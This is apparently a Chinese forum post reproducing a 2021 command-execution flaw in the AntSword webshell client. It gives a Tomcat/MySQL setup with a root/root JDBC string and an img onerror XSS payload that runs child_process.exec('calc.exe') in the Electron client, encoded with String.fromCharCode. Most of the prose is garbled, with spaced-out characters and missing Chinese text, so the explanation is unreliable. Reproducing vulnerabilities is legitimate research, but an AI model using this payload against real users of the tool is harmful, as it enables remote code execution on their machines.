搜索

[18643] 2021-08-10_蚁剑命令执行漏洞复现

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2021-08-10_蚁剑命令执行漏洞复现   f 4 l t J 4 y   h e r e 4 0 4   2 0 2 1 - 0 8 - 1 0   #   , 1 0 x 0 0   2 . 1 . 6 0 x 0 1   g i t h t t p s : / / g i t h u b . c o m / A n t S w o r d P r o j e c t / a n t S w o r d / r e l e a s e s ? a f t e r = 2 . 1 . 7 使 h t t p s : / / g i t h u b . c o m / A n t S w o r d P r o j e c t / A n t S w o r d - L o a d e r 2 . 1 . 7 p o c 2 . 1 . 7
使 g i t j a v a   w e b t o m c a t 使 t o m c a t 7 j s p w e b s h e l l t o m c a t s h e l l 使 m y s q l s h e l l 使 s h e l l c o m . m y s q l . j d b c . D r i v e r   j d b c : m y s q l : / / l o c a l h o s t : 3 3 0 6 / b o o k s t o r e ? u s e r = r o o t & p a s s w o r d = r o o t
m y s q l t o m c a t l i b m y s q l p a y l o a d 使 " > < i m g   s r c = 1   o n e r r o r = a l e r t ` 1 ` > 0 x 0 2   p a y l o a d a = " r e q u i r e ( ' c h i l d _ p r o c e s s ' ) . e x e c ( ' c a l c . e x e ' ) " b = " " f o r ( i = 0 ; i < a . l e n g t h ; i + + )         b   =   b   +   " , "   + a . c h a r C o d e A t ( i ) p a y l o a d < i m g   s r c = 1   o n e r r o r = " e v a l ( S t r i n g . f r o m C h a r C o d e ( 1 1 4 , 1 0 1 , 1 1 3 , 1 1 7 , 1 0 5 , 1 1 4 , 1 0 1 , 4 0 , 3 9 , 9 9 , 1 0 4 , 1 0 5 , 1 0 8 , 1 0 0 , 9 5 , 1 1 2 , 1 1 4 , 1 1 1 , 9 9 , 1 0 1 , 1 1 5 , 1 1 5 , 3 9 , 4 1 , 4 6 , 1 0 1 , 1 2 0 , 1 0 1 , 9 9 , 4 0 , 3 9 , 9 9 , 9 7 , 1 0 8 , 9 9 , 4 6 , 1 0 1 , 1 2 0 , 1 0 1 , 3 9 , 4 1 ) ) "
p a y l o a d 0 x 0 3   使 E l e c t r o n h t m l x s s 使 n o d e j s j s n o d e j s
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理